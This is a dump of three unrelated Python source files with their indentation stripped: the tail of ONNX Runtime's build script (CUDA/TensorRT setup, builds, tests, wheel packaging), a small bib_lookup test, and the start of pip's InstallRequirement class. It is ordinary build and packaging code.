os.environ["PATH"] = os.path.join(config_build_dir, "external", "tvm", config) + os.pathsep + os.environ["PATH"]
run_subprocess(cmake_args + ["-DCMAKE_BUILD_TYPE={}".format(config)], cwd=config_build_dir)
def clean_targets(cmake_path, build_dir, configs):
for config in configs:
log.info("Cleaning targets for %s configuration", config)
build_dir2 = get_config_build_dir(build_dir, config)
cmd_args = [cmake_path,
"--build", build_dir2,
"--config", config,
"--target", "clean"]
run_subprocess(cmd_args)
def build_targets(cmake_path, build_dir, configs, parallel):
for config in configs:
log.info("Building targets for %s configuration", config)
build_dir2 = get_config_build_dir(build_dir, config)
cmd_args = [cmake_path,
"--build", build_dir2,
"--config", config]
build_tool_args = []
if parallel:
num_cores = str(multiprocessing.cpu_count())
if is_windows():
build_tool_args += ["/maxcpucount:" + num_cores]
else:
build_tool_args += ["-j" + num_cores]
if (build_tool_args):
cmd_args += [ "--" ]
cmd_args += build_tool_args
run_subprocess(cmd_args)
def add_dir_if_exists(dir, dir_list):
if (os.path.isdir(dir)):
dir_list.append(dir)
def setup_cuda_vars(args):
cuda_home = ""
cudnn_home = ""
if (args.use_cuda):
cuda_home = args.cuda_home if args.cuda_home else os.getenv("CUDA_HOME")
cudnn_home = args.cudnn_home if args.cudnn_home else os.getenv("CUDNN_HOME")
cuda_home_valid = (cuda_home != None and os.path.exists(cuda_home))
cudnn_home_valid = (cudnn_home != None and os.path.exists(cudnn_home))
if (not cuda_home_valid or not cudnn_home_valid):
raise BuildError("cuda_home and cudnn_home paths must be specified and valid.",
"cuda_home='{}' valid={}. cudnn_home='{}' valid={}"
.format(cuda_home, cuda_home_valid, cudnn_home, cudnn_home_valid))
if (is_windows()):
# Validate that the cudnn_home is pointing at the right level
if (not os.path.exists(os.path.join(cudnn_home, "bin"))):
raise BuildError("cudnn_home path should include the 'cuda' folder, and must contain the CUDNN 'bin' directory.",
"cudnn_home='{}'".format(cudnn_home))
os.environ["CUDA_PATH"] = cuda_home
os.environ["CUDA_TOOLKIT_ROOT_DIR"] = cuda_home
cuda_bin_path = os.path.join(cuda_home, 'bin')
os.environ["CUDA_BIN_PATH"] = cuda_bin_path
os.environ["PATH"] += os.pathsep + cuda_bin_path + os.pathsep + os.path.join(cudnn_home, 'bin')
# Add version specific CUDA_PATH_Vx_y value as the Visual Studio build files require that
version_file = os.path.join(cuda_home, 'version.txt')
if not os.path.exists(version_file):
raise BuildError("No version file found in CUDA install directory. Looked for " + version_file)
cuda_major_version = "unknown"
with open(version_file) as f:
# First line of version file should have something like 'CUDA Version 9.2.148'
first_line = f.readline()
m = re.match("CUDA Version (\d+).(\d+)", first_line)
if not m:
raise BuildError("Couldn't read version from first line of " + version_file)
cuda_major_version = m.group(1)
minor = m.group(2)
os.environ["CUDA_PATH_V{}_{}".format(cuda_major_version, minor)] = cuda_home
vc_ver_str = os.getenv("VCToolsVersion") or ""
vc_ver = vc_ver_str.split(".")
if len(vc_ver) != 3:
log.warning("Unable to automatically verify VS 2017 toolset is compatible with CUDA. Will attempt to use.")
log.warning("Failed to get valid Visual C++ Tools version from VCToolsVersion environment variable value of '" + vc_ver_str + "'")
log.warning("VCToolsVersion is set in a VS 2017 Developer Command shell, or by running \"%VS2017INSTALLDIR%\\VC\\Auxiliary\\Build\\vcvars64.bat\"")
log.warning("See build.md in the root ONNXRuntime directory for instructions on installing the Visual C++ 2017 14.11 toolset if needed.")
elif cuda_major_version == "9" and vc_ver[0] == "14" and int(vc_ver[1]) > 11:
raise BuildError("Visual C++ Tools version not supported by CUDA v9. You must setup the environment to use the 14.11 toolset.",
"Current version is {}. CUDA 9.2 requires version 14.11.*".format(vc_ver_str),
"If necessary manually install the 14.11 toolset using the Visual Studio 2017 updater.",
"See 'Windows CUDA Build' in build.md in the root directory of this repository.")
# TODO: check if cuda_version >=10.1, when cuda is enabled and VS version >=2019
return cuda_home, cudnn_home
def setup_tensorrt_vars(args):
tensorrt_home = ""
if (args.use_tensorrt):
tensorrt_home = args.tensorrt_home if args.tensorrt_home else os.getenv("TENSORRT_HOME")
tensorrt_home_valid = (tensorrt_home != None and os.path.exists(tensorrt_home))
if (not tensorrt_home_valid):
raise BuildError("tensorrt_home paths must be specified and valid.",
"tensorrt_home='{}' valid={}."
.format(tensorrt_home, tensorrt_home_valid))
# Set maximum batch size for TensorRT. The number needs to be no less than maximum batch size in all unit tests
os.environ["ORT_TENSORRT_MAX_BATCH_SIZE"] = "13"
# Set maximum workspace size in byte for TensorRT (1GB = 1073741824 bytes)
os.environ["ORT_TENSORRT_MAX_WORKSPACE_SIZE"] = "1073741824"
# Set maximum number of iterations to detect unsupported nodes and partition the models for TensorRT
os.environ["ORT_TENSORRT_MAX_PARSER_ITERATIONS"] = "6"
return tensorrt_home
def adb_push(source_dir, src, dest, **kwargs):
return run_subprocess([os.path.join(source_dir, 'tools', 'ci_build', 'github', 'android', 'adb-push.sh'), src, dest], **kwargs)
def adb_shell(*args, **kwargs):
return run_subprocess(['adb', 'shell', *args], **kwargs)
def run_onnxruntime_tests(args, source_dir, ctest_path, build_dir, configs, enable_python_tests, enable_tvm = False, enable_tensorrt = False, enable_ngraph = False):
for config in configs:
log.info("Running tests for %s configuration", config)
cwd = get_config_build_dir(build_dir, config)
android_x86_64 = args.android_abi == 'x86_64'
if android_x86_64:
run_subprocess(os.path.join(source_dir, 'tools', 'ci_build', 'github', 'android', 'start_android_emulator.sh'))
adb_push(source_dir, 'testdata', '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, os.path.join(source_dir, 'cmake', 'external', 'onnx', 'onnx', 'backend', 'test'), '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, 'onnxruntime_test_all', '/data/local/tmp/', cwd=cwd)
adb_push(source_dir, 'onnx_test_runner', '/data/local/tmp/', cwd=cwd)
adb_shell('cd /data/local/tmp && /data/local/tmp/onnxruntime_test_all')
if args.use_dnnlibrary:
adb_shell('cd /data/local/tmp && /data/local/tmp/onnx_test_runner -e nnapi /data/local/tmp/test')
else:
adb_shell('cd /data/local/tmp && /data/local/tmp/onnx_test_runner /data/local/tmp/test')
continue
if enable_tvm:
dll_path = os.path.join(build_dir, config, "external", "tvm", config)
elif enable_tensorrt:
dll_path = os.path.join(args.tensorrt_home, 'lib')
else:
dll_path = None
run_subprocess([ctest_path, "--build-config", config, "--verbose"],
cwd=cwd, dll_path=dll_path)
if enable_python_tests:
# Disable python tests for TensorRT because many tests are not supported yet
if enable_tensorrt :
return
if is_windows():
cwd = os.path.join(cwd, config)
run_subprocess([sys.executable, 'onnxruntime_test_python.py'], cwd=cwd, dll_path=dll_path)
try:
import onnx
onnx_test = True
except ImportError:
warnings.warn("onnx is not installed. Following test cannot be run.")
onnx_test = False
if onnx_test:
run_subprocess([sys.executable, 'onnxruntime_test_python_backend.py'], cwd=cwd, dll_path=dll_path)
run_subprocess([sys.executable, os.path.join(source_dir,'onnxruntime','test','onnx','gen_test_models.py'),'--output_dir','test_models'], cwd=cwd)
run_subprocess([os.path.join(cwd,'onnx_test_runner'), 'test_models'], cwd=cwd)
if config != 'Debug':
run_subprocess([sys.executable, 'onnx_backend_test_series.py'], cwd=cwd, dll_path=dll_path)
if not args.skip_keras_test:
try:
import onnxmltools
import keras
onnxml_test = True
except ImportError:
warnings.warn("onnxmltools and keras are not installed. Following test cannot be run.")
onnxml_test = False
if onnxml_test:
run_subprocess([sys.executable, 'onnxruntime_test_python_keras.py'], cwd=cwd, dll_path=dll_path)
def run_onnx_tests(build_dir, configs, onnx_test_data_dir, provider, enable_parallel_executor_test, num_parallel_models):
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
exe = os.path.join(cwd, config, 'onnx_test_runner')
model_dir = os.path.join(cwd, "models")
else:
exe = os.path.join(cwd, 'onnx_test_runner')
model_dir = os.path.join(build_dir, "models")
cmd = []
if provider:
cmd += ["-e", provider]
if provider == 'mkldnn':
cmd += ['-c', '1']
if provider == 'openvino':
cmd += ['-c', '1']
if provider == 'nuphar':
cmd += ['-c', '1']
if num_parallel_models > 0:
cmd += ["-j", str(num_parallel_models)]
if config != 'Debug' and os.path.exists(model_dir):
if provider == 'tensorrt':
model_dir = os.path.join(model_dir, "opset8")
cmd.append(model_dir)
if os.path.exists(onnx_test_data_dir):
cmd.append(onnx_test_data_dir)
if config == 'Debug' and provider == 'nuphar':
return
run_subprocess([exe] + cmd, cwd=cwd)
if enable_parallel_executor_test:
run_subprocess([exe,'-x'] + cmd, cwd=cwd)
# mkldnn temporary function for running onnx tests and model tests separately.
def mkldnn_run_onnx_tests(build_dir, configs, onnx_test_data_dir):
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
exe = os.path.join(cwd, config, 'onnx_test_runner')
model_dir = os.path.join(cwd, "models")
else:
exe = os.path.join(cwd, 'onnx_test_runner')
model_dir = os.path.join(build_dir, "models")
cmd_base = ['-e', 'mkldnn', '-c', '1', '-j', '1']
if os.path.exists(onnx_test_data_dir):
onnxdata_cmd = cmd_base + [onnx_test_data_dir]
# /data/onnx
run_subprocess([exe] + onnxdata_cmd, cwd=cwd)
run_subprocess([exe,'-x'] + onnxdata_cmd, cwd=cwd)
# models/opset7, models/opset8, models/opset9
if config != 'Debug' and os.path.exists(model_dir):
opset7_model_dir = os.path.join(model_dir, 'opset7')
opset7_cmd = cmd_base + [opset7_model_dir]
opset8_model_dir = os.path.join(model_dir, 'opset8')
opset8_cmd = cmd_base + [opset8_model_dir]
opset9_model_dir = os.path.join(model_dir, 'opset9')
opset9_cmd = cmd_base + [opset9_model_dir]
run_subprocess([exe] + opset7_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset7_cmd, cwd=cwd)
run_subprocess([exe] + opset8_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset8_cmd, cwd=cwd)
run_subprocess([exe] + opset9_cmd, cwd=cwd)
run_subprocess([exe, '-x'] + opset9_cmd, cwd=cwd)
# nuphar temporary function for running python tests separately as it requires ONNX 1.5.0
def nuphar_run_python_tests(build_dir, configs, azure_sas_key):
for config in configs:
if config == 'Debug':
continue
cwd = get_config_build_dir(build_dir, config)
if is_windows():
cwd = os.path.join(cwd, config)
dll_path = os.path.join(build_dir, config, "external", "tvm", config)
# install onnx for shape inference in testing Nuphar scripts
# this needs to happen after onnx_test_data preparation which uses onnx 1.3.0
run_subprocess([sys.executable, '-m', 'pip', 'install', '--user', 'onnx==1.5.0'])
run_subprocess([sys.executable, 'onnxruntime_test_python_nuphar.py'], cwd=cwd, dll_path=dll_path)
def split_server_binary_and_symbol(build_dir, configs):
if is_windows():
# TODO: Windows support
pass
else:
for config in configs:
if config == 'RelWithDebInfo':
config_build_dir = get_config_build_dir(build_dir, config)
run_subprocess(['objcopy', '--only-keep-debug', 'onnxruntime_server', 'onnxruntime_server.symbol'], cwd=config_build_dir)
run_subprocess(['strip', '--strip-debug', '--strip-unneeded', 'onnxruntime_server'], cwd=config_build_dir)
run_subprocess(['objcopy', '--add-gnu-debuglink=onnxruntime_server.symbol', 'onnxruntime_server'], cwd=config_build_dir)
libonnx = glob.glob(os.path.join(config_build_dir, "libonnxruntime.so.*"))
if len(libonnx) != 1 :
raise ValueError("Too many libonxruntime.so.*")
libonnx = libonnx[0]
run_subprocess(['objcopy', '--only-keep-debug', libonnx, libonnx+'.symbol'], cwd=config_build_dir)
run_subprocess(['strip', '--strip-debug', libonnx], cwd=config_build_dir)
run_subprocess(['objcopy', '--add-gnu-debuglink={}.symbol'.format(libonnx), libonnx], cwd=config_build_dir)
def run_server_tests(build_dir, configs):
pip_freeze_result = run_subprocess([sys.executable, '-m', 'pip', 'freeze'], capture=True).stdout
installed_packages = [r.decode().split('==')[0] for r in pip_freeze_result.split()]
if not (('requests' in installed_packages) and ('protobuf' in installed_packages) and ('numpy' in installed_packages) and ('grpcio' in installed_packages)):
if hasattr(sys, 'real_prefix'):
# In virtualenv
run_subprocess([sys.executable, '-m', 'pip', 'install', '--trusted-host', 'files.pythonhosted.org', 'requests', 'protobuf', 'numpy', 'grpcio'])
else:
# Outside virtualenv
run_subprocess([sys.executable, '-m', 'pip', 'install', '--user', '--trusted-host', 'files.pythonhosted.org', 'requests', 'protobuf', 'numpy', 'grpcio'])
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
if is_windows():
server_app_path = os.path.join(config_build_dir, config, 'onnxruntime_server.exe')
python_package_path = os.path.join(config_build_dir, config)
else:
server_app_path = os.path.join(config_build_dir, 'onnxruntime_server')
python_package_path = config_build_dir
server_test_folder = os.path.join(config_build_dir, 'server_test')
server_test_data_folder = os.path.join(os.path.join(config_build_dir, 'testdata'), 'server')
run_subprocess([sys.executable, 'test_main.py', server_app_path, server_test_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
def run_server_model_tests(build_dir, configs):
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
server_test_folder = os.path.join(config_build_dir, 'server_test')
server_test_data_folder = os.path.join(config_build_dir, 'server_test_data')
if is_windows():
server_app_path = os.path.join(config_build_dir, config, 'onnxruntime_server.exe')
test_raw_data_folder = os.path.join(config_build_dir, 'models')
python_package_path = os.path.join(config_build_dir, config)
else:
server_app_path = os.path.join(config_build_dir, 'onnxruntime_server')
test_raw_data_folder = os.path.join(build_dir, 'models')
python_package_path = config_build_dir
run_subprocess([sys.executable, 'model_zoo_data_prep.py', test_raw_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
run_subprocess([sys.executable, 'model_zoo_tests.py', server_app_path, test_raw_data_folder, server_test_data_folder, python_package_path, server_test_folder], cwd=server_test_folder, dll_path=None)
def build_python_wheel(source_dir, build_dir, configs, use_cuda, use_ngraph, use_tensorrt, use_openvino, use_nuphar, nightly_build = False):
for config in configs:
cwd = get_config_build_dir(build_dir, config)
if is_windows():
cwd = os.path.join(cwd, config)
args = [sys.executable, os.path.join(source_dir, 'setup.py'), 'bdist_wheel']
if nightly_build:
args.append('--nightly_build')
if use_tensorrt:
args.append('--use_tensorrt')
elif use_cuda:
args.append('--use_cuda')
elif use_ngraph:
args.append('--use_ngraph')
elif use_openvino:
args.append('--use_openvino')
elif use_nuphar:
args.append('--use_nuphar')
run_subprocess(args, cwd=cwd)
def build_protoc_for_host(cmake_path, source_dir, build_dir, args):
if (args.arm or args.arm64) and not is_windows():
raise BuildError('Currently only support building protoc for Windows host while cross-compiling for ARM/ARM64 arch')
log.info("Building protoc for host to be used in cross-compiled build process")
protoc_build_dir = os.path.join(os.getcwd(), build_dir, 'host_protoc')
os.makedirs(protoc_build_dir, exist_ok=True)
# Generate step
cmd_args = [cmake_path,
os.path.join(source_dir, 'cmake', 'external', 'protobuf', 'cmake'),
'-Dprotobuf_BUILD_TESTS=OFF',
'-Dprotobuf_WITH_ZLIB_DEFAULT=OFF',
'-Dprotobuf_BUILD_SHARED_LIBS=OFF']
if is_windows():
cmd_args += ['-T',
'host=x64',
'-G',
args.cmake_generator]
run_subprocess(cmd_args, cwd= protoc_build_dir)
# Build step
cmd_args = [cmake_path,
"--build", protoc_build_dir,
"--config", "Release",
"--target", "protoc"]
run_subprocess(cmd_args)
# Absolute protoc path is needed for cmake
expected_protoc_path = os.path.join(protoc_build_dir, 'Release', 'protoc.exe') if is_windows() else os.path.join(protoc_build_dir, 'protoc')
if not os.path.exists(expected_protoc_path):
raise BuildError("Couldn't build protoc for host. Failing build.")
return expected_protoc_path
def generate_documentation(source_dir, build_dir, configs):
operator_doc_path = os.path.join(source_dir, 'docs', 'ContribOperators.md')
opkernel_doc_path = os.path.join(source_dir, 'docs', 'OperatorKernels.md')
for config in configs:
#copy the gen_doc.py
shutil.copy(os.path.join(source_dir,'tools','python','gen_doc.py'),
os.path.join(build_dir,config, config))
shutil.copy(os.path.join(source_dir,'tools','python','gen_opkernel_doc.py'),
os.path.join(build_dir,config, config))
run_subprocess([
sys.executable,
'gen_doc.py',
'--output_path', operator_doc_path
],
cwd = os.path.join(build_dir,config, config))
run_subprocess([
sys.executable,
'gen_opkernel_doc.py',
'--output_path', opkernel_doc_path
],
cwd = os.path.join(build_dir,config, config))
docdiff = ''
try:
docdiff = subprocess.check_output(['git', 'diff', opkernel_doc_path])
except subprocess.CalledProcessError:
print('git diff returned non-zero error code')
if len(docdiff) > 0:
# Show warning instead of throwing exception, because it is dependent on build configuration for including execution propviders
log.warning('The updated opkernel document file '+str(opkernel_doc_path)+' is different from the checked in version. Consider regenrating the file with CPU, MKLDNN and CUDA providers enabled.')
log.debug('diff:\n'+str(docdiff))
docdiff = ''
try:
docdiff = subprocess.check_output(['git', 'diff', operator_doc_path])
except subprocess.CalledProcessError:
print('git diff returned non-zero error code')
if len(docdiff) > 0:
raise BuildError('The updated operator document file '+str(operator_doc_path)+' must be checked in.\n diff:\n'+str(docdiff))
def main():
args = parse_arguments()
cmake_extra_defines = args.cmake_extra_defines if args.cmake_extra_defines else []
cross_compiling = args.arm or args.arm64 or args.android
# if there was no explicit argument saying what to do, default to update, build and test (for native builds).
if (args.update == False and args.clean == False and args.build == False and args.test == False):
log.debug("Defaulting to running update, build [and test for native builds].")
args.update = True
args.build = True
if cross_compiling:
args.test = args.android_abi == 'x86_64'
else:
args.test = True
if args.use_tensorrt:
args.use_cuda = True
if args.build_wheel or args.enable_server_model_tests:
args.enable_pybind = True
if args.build_csharp:
args.build_shared_lib = True
configs = set(args.config)
# setup paths and directories
cmake_path = resolve_executable_path(args.cmake_path)
ctest_path = resolve_executable_path(args.ctest_path)
build_dir = args.build_dir
script_dir = os.path.realpath(os.path.dirname(__file__))
source_dir = os.path.normpath(os.path.join(script_dir, "..", ".."))
# if using cuda, setup cuda paths and env vars
cuda_home, cudnn_home = setup_cuda_vars(args)
# if using tensorrt, setup tensorrt paths
tensorrt_home = setup_tensorrt_vars(args)
os.makedirs(build_dir, exist_ok=True)
log.info("Build started")
if (args.update):
cmake_extra_args = []
path_to_protoc_exe = None
if(is_windows()):
if (args.x86):
cmake_extra_args = ['-A','Win32','-T','host=x64','-G', args.cmake_generator]
elif (args.arm or args.arm64):
# Cross-compiling for ARM(64) architecture
# First build protoc for host to use during cross-compilation
path_to_protoc_exe = build_protoc_for_host(cmake_path, source_dir, build_dir, args)
if args.arm:
cmake_extra_args = ['-A', 'ARM']
else:
cmake_extra_args = ['-A', 'ARM64']
cmake_extra_args += ['-G', args.cmake_generator]
# Cannot test on host build machine for cross-compiled builds (Override any user-defined behaviour for test if any)
if args.test:
log.info("Cannot test on host build machine for cross-compiled ARM(64) builds. Will skip test running after build.")
args.test = False
else:
toolset = 'host=x64'
if (args.msvc_toolset):
toolset += ',version=' + args.msvc_toolset
if (args.cuda_version):
toolset += ',cuda=' + args.cuda_version
cmake_extra_args = ['-A','x64','-T', toolset, '-G', args.cmake_generator]
if args.android:
# Cross-compiling for Android
path_to_protoc_exe = build_protoc_for_host(cmake_path, source_dir, build_dir, args)
if is_ubuntu_1604():
if (args.arm or args.arm64):
raise BuildError("Only Windows ARM(64) cross-compiled builds supported currently through this script")
install_ubuntu_deps(args)
if not is_docker():
install_python_deps()
if (args.enable_pybind and is_windows()):
install_python_deps(args.numpy_version)
if (not args.skip_submodule_sync):
update_submodules(source_dir)
if args.enable_onnx_tests or args.download_test_data:
if args.download_test_data:
if not args.test_data_url or not args.test_data_checksum:
raise UsageError("The test_data_url and test_data_checksum arguments are required.")
setup_test_data(build_dir, configs, args.test_data_url, args.test_data_checksum, args.azure_sas_key)
if args.path_to_protoc_exe:
path_to_protoc_exe = args.path_to_protoc_exe
generate_build_tree(cmake_path, source_dir, build_dir, cuda_home, cudnn_home, tensorrt_home, path_to_protoc_exe, configs, cmake_extra_defines,
args, cmake_extra_args)
if (args.clean):
clean_targets(cmake_path, build_dir, configs)
if (args.build):
build_targets(cmake_path, build_dir, configs, args.parallel)
if args.test :
run_onnxruntime_tests(args, source_dir, ctest_path, build_dir, configs,
args.enable_pybind and not args.skip_onnx_tests,
args.use_tvm, args.use_tensorrt, args.use_ngraph)
# run the onnx model tests if requested explicitly.
if args.enable_onnx_tests and not args.skip_onnx_tests:
# directory from ONNX submodule with ONNX test data
onnx_test_data_dir = '/data/onnx'
if is_windows() or not os.path.exists(onnx_test_data_dir):
onnx_test_data_dir = os.path.join(source_dir, "cmake", "external", "onnx", "onnx", "backend", "test", "data")
if args.use_tensorrt:
# Disable some onnx unit tests that TensorRT parser doesn't supported yet
onnx_test_data_dir = os.path.join(source_dir, "cmake", "external", "onnx", "onnx", "backend", "test", "data", "simple")
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'tensorrt', False, 1)
elif args.use_cuda:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'cuda', False, 2)
elif args.x86 or platform.system() == 'Darwin':
run_onnx_tests(build_dir, configs, onnx_test_data_dir, None, False, 1)
elif args.use_ngraph:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'ngraph', True, 1)
elif args.use_openvino:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'openvino', False, 1)
# TODO: parallel executor test fails on MacOS
elif args.use_nuphar:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, 'nuphar', False, 1)
else:
run_onnx_tests(build_dir, configs, onnx_test_data_dir, None, True, 0)
if args.use_mkldnn:
mkldnn_run_onnx_tests(build_dir, configs, onnx_test_data_dir)
# run nuphar python tests last, as it installs ONNX 1.5.0
if args.enable_pybind and not args.skip_onnx_tests and args.use_nuphar:
nuphar_run_python_tests(build_dir, configs, args.azure_sas_key)
if args.build_server:
split_server_binary_and_symbol(build_dir, configs)
if args.enable_server_tests:
run_server_tests(build_dir, configs)
if args.enable_server_model_tests:
run_server_model_tests(build_dir, configs)
if args.build:
if args.build_wheel:
nightly_build = bool(os.getenv('NIGHTLY_BUILD') == '1')
build_python_wheel(source_dir, build_dir, configs, args.use_cuda, args.use_ngraph, args.use_tensorrt, args.use_openvino, args.use_nuphar, nightly_build)
if args.gen_doc and (args.build or args.test):
generate_documentation(source_dir, build_dir, configs)
log.info("Build complete")
if __name__ == "__main__":
try:
sys.exit(main())
except BaseError as e:
log.error(str(e))
sys.exit(1)
|
the-stack_106_12945
|
from pathlib import Path
try:
import bib_lookup
except ModuleNotFoundError:
import sys
sys.path.insert(0, str(Path(__file__).parent.parent.resolve()))
import bib_lookup
_CWD = Path(__file__).absolute().parent
_INPUT_FILE = _CWD / "invalid_items.bib"
def test_checking():
bl = bib_lookup.BibLookup()
err_lines = bl.check_bib_file(_INPUT_FILE)
assert err_lines == [3, 16, 45]
if __name__ == "__main__":
test_checking()
|
the-stack_106_12948
|
from __future__ import absolute_import
import logging
import os
import re
import shutil
import sys
import sysconfig
import traceback
import warnings
import zipfile
from distutils.util import change_root
from email.parser import FeedParser # type: ignore
from pip._vendor import pkg_resources, pytoml, six
from pip._vendor.packaging import specifiers
from pip._vendor.packaging.markers import Marker
from pip._vendor.packaging.requirements import InvalidRequirement, Requirement
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.packaging.version import Version
from pip._vendor.pkg_resources import RequirementParseError, parse_requirements
from pip._internal import wheel
from pip._internal.build_env import BuildEnvironment
from pip._internal.compat import native_str
from pip._internal.download import (
is_archive_file, is_url, path_to_url, url_to_path,
)
from pip._internal.exceptions import InstallationError, UninstallationError
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, running_under_virtualenv,
)
from pip._internal.req.req_uninstall import UninstallPathSet
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.hashes import Hashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
_make_build_dir, ask_path_exists, backup_dir, call_subprocess,
display_path, dist_in_site_packages, dist_in_usersite, ensure_dir,
get_installed_version, is_installable_dir, read_text_file, rmtree,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.ui import open_spinner
from pip._internal.vcs import vcs
from pip._internal.wheel import Wheel, move_wheel_files
logger = logging.getLogger(__name__)
operators = specifiers.Specifier._operators.keys()
def _strip_extras(path):
m = re.match(r'^(.+)(\[[^\]]+\])$', path)
extras = None
if m:
path_no_extras = m.group(1)
extras = m.group(2)
else:
path_no_extras = path
return path_no_extras, extras
class InstallRequirement(object):
"""
Represents something that may be installed later on, may have information
about where to fetch the relavant requirement and also contains logic for
installing the said requirement.
"""
def __init__(self, req, comes_from, source_dir=None, editable=False,
link=None, update=True, markers=None,
isolated=False, options=None, wheel_cache=None,
constraint=False, extras=()):
assert req is None or isinstance(req, Requirement), req
self.req = req
self.comes_from = comes_from
self.constraint = constraint
if source_dir is not None:
self.source_dir = os.path.normpath(os.path.abspath(source_dir))
else:
self.source_dir = None
self.editable = editable
self._wheel_cache = wheel_cache
if link is not None:
self.link = self.original_link = link
else:
from pip._internal.index import Link
self.link = self.original_link = req and req.url and Link(req.url)
if extras:
self.extras = extras
elif req:
self.extras = {
pkg_resources.safe_extra(extra) for extra in req.extras
}
else:
self.extras = set()
if markers is not None:
self.markers = markers
else:
self.markers = req and req.marker
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
# This hold the pkg_resources.Distribution object if this requirement
# conflicts with another installed distribution:
self.conflicts_with = None
# Temporary build location
self._temp_build_dir = TempDirectory(kind="req-build")
# Used to store the global directory where the _temp_build_dir should
# have been created. Cf _correct_build_location method.
self._ideal_build_dir = None
# True if the editable should be updated:
self.update = update
# Set to True after successful installation
self.install_succeeded = None
# UninstallPathSet of uninstalled distribution (for possible rollback)
self.uninstalled_pathset = None
self.options = options if options else {}
# Set to True after successful preparation of this requirement
self.prepared = False
self.is_direct = False
self.isolated = isolated
self.build_env = BuildEnvironment(no_clean=True)
@classmethod
def from_editable(cls, editable_req, comes_from=None, isolated=False,
options=None, wheel_cache=None, constraint=False):
from pip._internal.index import Link
name, url, extras_override = parse_editable(editable_req)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
if name is not None:
try:
req = Requirement(name)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % name)
else:
req = None
return cls(
req, comes_from, source_dir=source_dir,
editable=True,
link=Link(url),
constraint=constraint,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
extras=extras_override or (),
)
@classmethod
def from_req(cls, req, comes_from=None, isolated=False, wheel_cache=None):
try:
req = Requirement(req)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % req)
if req.url:
raise InstallationError(
"Direct url requirement (like %s) are not allowed for "
"dependencies" % req
)
return cls(req, comes_from, isolated=isolated, wheel_cache=wheel_cache)
@classmethod
def from_line(
cls, name, comes_from=None, isolated=False, options=None,
wheel_cache=None, constraint=False):
"""Creates an InstallRequirement from a name, which might be a
requirement, directory containing 'setup.py', filename, or URL.
"""
from pip._internal.index import Link
if is_url(name):
marker_sep = '; '
else:
marker_sep = ';'
if marker_sep in name:
name, markers = name.split(marker_sep, 1)
markers = markers.strip()
if not markers:
markers = None
else:
markers = Marker(markers)
else:
markers = None
name = name.strip()
req = None
path = os.path.normpath(os.path.abspath(name))
link = None
extras = None
if is_url(name):
link = Link(name)
else:
p, extras = _strip_extras(path)
looks_like_dir = os.path.isdir(p) and (
os.path.sep in name or
(os.path.altsep is not None and os.path.altsep in name) or
name.startswith('.')
)
if looks_like_dir:
if not is_installable_dir(p):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' "
"not found." % name
)
link = Link(path_to_url(p))
elif is_archive_file(p):
if not os.path.isfile(p):
logger.warning(
'Requirement %r looks like a filename, but the '
'file does not exist',
name
)
link = Link(path_to_url(p))
# it's a local file, dir, or url
if link:
# Handle relative file URLs
if link.scheme == 'file' and re.search(r'\.\./', link.url):
link = Link(
path_to_url(os.path.normpath(os.path.abspath(link.path))))
# wheel file
if link.is_wheel:
wheel = Wheel(link.filename) # can raise InvalidWheelFilename
req = "%s==%s" % (wheel.name, wheel.version)
else:
# set the req to the egg fragment. when it's not there, this
# will become an 'unnamed' requirement
req = link.egg_fragment
# a requirement specifier
else:
req = name
if extras:
extras = Requirement("placeholder" + extras.lower()).extras
else:
extras = ()
if req is not None:
try:
req = Requirement(req)
except InvalidRequirement:
if os.path.sep in req:
add_msg = "It looks like a path."
add_msg += deduce_helpful_msg(req)
elif '=' in req and not any(op in req for op in operators):
add_msg = "= is not a valid operator. Did you mean == ?"
else:
add_msg = traceback.format_exc()
raise InstallationError(
"Invalid requirement: '%s'\n%s" % (req, add_msg))
return cls(
req, comes_from, link=link, markers=markers,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
constraint=constraint,
extras=extras,
)
def __str__(self):
if self.req:
s = str(self.req)
if self.link:
s += ' from %s' % self.link.url
else:
s = self.link.url if self.link else None
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def __repr__(self):
return '<%s object: %s editable=%r>' % (
self.__class__.__name__, str(self), self.editable)
def populate_link(self, finder, upgrade, require_hashes):
"""Ensure that if a link can be found for this, that it is found.
Note that self.link may still be None - if Upgrade is False and the
requirement is already installed.
If require_hashes is True, don't use the wheel cache, because cached
wheels, always built locally, have different hashes than the files
downloaded from the index server and thus throw false hash mismatches.
Furthermore, cached wheels at present have undeterministic contents due
to file modification times.
"""
if self.link is None:
self.link = finder.find_requirement(self, upgrade)
if self._wheel_cache is not None and not require_hashes:
old_link = self.link
self.link = self._wheel_cache.get(self.link, self.name)
if old_link != self.link:
